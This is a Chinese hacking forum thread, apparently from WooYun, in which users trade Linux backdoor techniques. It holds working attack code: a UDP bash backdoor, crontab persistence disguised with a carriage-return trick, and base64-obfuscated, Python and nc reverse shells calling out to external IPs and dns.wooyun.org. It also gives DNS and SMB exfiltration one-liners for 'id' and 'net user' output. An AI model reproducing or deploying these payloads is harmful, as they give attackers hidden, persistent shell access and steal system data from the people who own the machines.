bash udp反弹后门：
#!/bin/bash
exec 9<> /dev/udp/localhost/8080
[ $? -eq 1 ] && exit
echo "connect ok" >&9

while :
do
  a=`dd bs=200 count=1 <&9 2>/dev/null`
  if echo "$a"|grep "exit"; then break; fi
  echo `$a` >&9
done

exec 9>&-
exec 9<&-
https://github.com/cloudsec/brootkit/blob/master/ubd.sh

赞

好牛逼

赞

微博中中看到了，赞一个

目测连接成功后，也是很难被发现的。

这么说猪猪侠有很多后门咯

更加隐藏的版本
(crontab -l;printf "*/60 * * * * exec 9<> /dev/tcp/dns.wooyun.org/53;exec 0<&9;exec 1>&9 2>&1;/bin/bash --noprofile -i;\rno crontab for `whoami`%100c\n")|crontab -

好东西....

好牛啊

屌屌屌

收藏..

猪哥终于分享多年的经验了

@猪猪侠 这个隐藏版本确实学到了，湾湾orange吊吊的

/var/spool/cron/ 连个read 权限都没有

crontab  也没权限 。。。

@superbing @superbing 理想很丰满，现实很骨感。。。

太恐怖了！

tty设置不对的话，第二条反而惹嫌疑

想象是美好的，现实是残酷的。。

@猪猪侠 你在乌云那么叼，你领导知道吗？

简单好用易懂

收藏～～～～

赞！

exec 9<> /dev/tcp/localhost/8080&&exec 0<&9&&exec 1>&9 2>&1&&/bin/bash --noprofile -i

这样tcp连接不成功， 就不会继续执行bash了, 不然每隔1小时系统里就会多出一个/bin/bash -i的进程。

另外还可以把反弹后门用base64加密，运行时解密：
*/1 * * * * a=`echo "ZXhlYyA5PD4gL2Rldi90Y3AvbG9jYWxob3N0LzgwODA7ZXhlYyAwPCY5O2V4ZWMgMT4mOSAyPiYxOy9iaW4vYmFzaCAtLW5vcHJvZmlsZSAtaQ=="|base64 -d`;/bin/bash -c "$a";unset a

更多关于bash的渗透技巧请访问：https://github.com/cloudsec/brootkit

@wzt 赞

刚刚orange又教一招
printf "*/3 * * * * $CMD;\rno crontab for $USER%$((${#CMD}+10))c\n" | crontab -

@Well 求头像番号

mark

mark.

@wzt 赏你一个乌云币。

@keke 点感谢后，发你

@wzt Nice Nice

这个还是比较有用的，先记下...

先记录一下啊

@Well 点了啊 快点发来

//python版本，kali下面测试成功,tcp 8080:
(crontab -l;printf "*/5 * * * *  /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.1.153\",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);';\rno crontab for `whoami`%100c\n")|crontab -

//python版本，kali下面测试成功,tcp 8080:
(crontab -l;printf "*/5 * * * *  /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.1.153\",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);';\rno crontab for `whoami`%100c\n")|crontab -

自动转义真烦人，大家把上面代码的双斜线修改为单斜线！

//nc版本，tcp 8080 kali下面测试成功:
(crontab -l;printf "*/5 * * * *  /bin/nc 192.168.1.153 8080 -e /bin/sh;\rno crontab for `whoami`%100c\n")|crontab -

@wzt 端口根据目标机器定会更好

虽然我不知道你们在说什么但是 我知道你们一定说的很牛逼

百度有新闻么  ：）

(ส็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็ส้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้ส็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็ส้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้)

net user | nslookup type=A  144.144.144.144

net user > \\ip\c$\xxx.txt


http://www.freebuf.com/articles/system/57183.html

http://paper.aliapp.com/md/dns.txt

LINE=`id`; domain="yourdomain.com";while read -r -n 1 char;
do var+=$(printf "%X" \'$char\');done<<<$LINE;b=0;e=60;l=${#var};
while [ $b -lt $l ];do >& /dev/udp/$RANDOM.$b."${var:$b:$e}".
$domain/53 0>&1;let b=b+60;done;>& /dev/udp/$RANDOM.theend.$domain/53
0>&1;unset var;unset var2

@猪猪侠 猪哥来一发Linux下端口复用和 Win下ndis复用的科普文章。

作为一个Wooyun党,里面其实还有两个白帽子也发来类似的

http://zone.wooyun.org/content/11338

http://zone.wooyun.org/content/6041

现在的内网dns都出不来只能靠复用了

@猪猪侠 猪哥来一发Linux下端口复用和 Win下ndis复用的科普文章。

你们够了。。

(ส็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็ส้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้ส็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็ส้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้)

@顺子 短消息已经发你了

@keke 短消息发你了

mark

猪哥来一发Linux下端口复用和 Win下ndis复用的科普文章。

虽然听不懂你在说什么 ，我还是Mark一下吧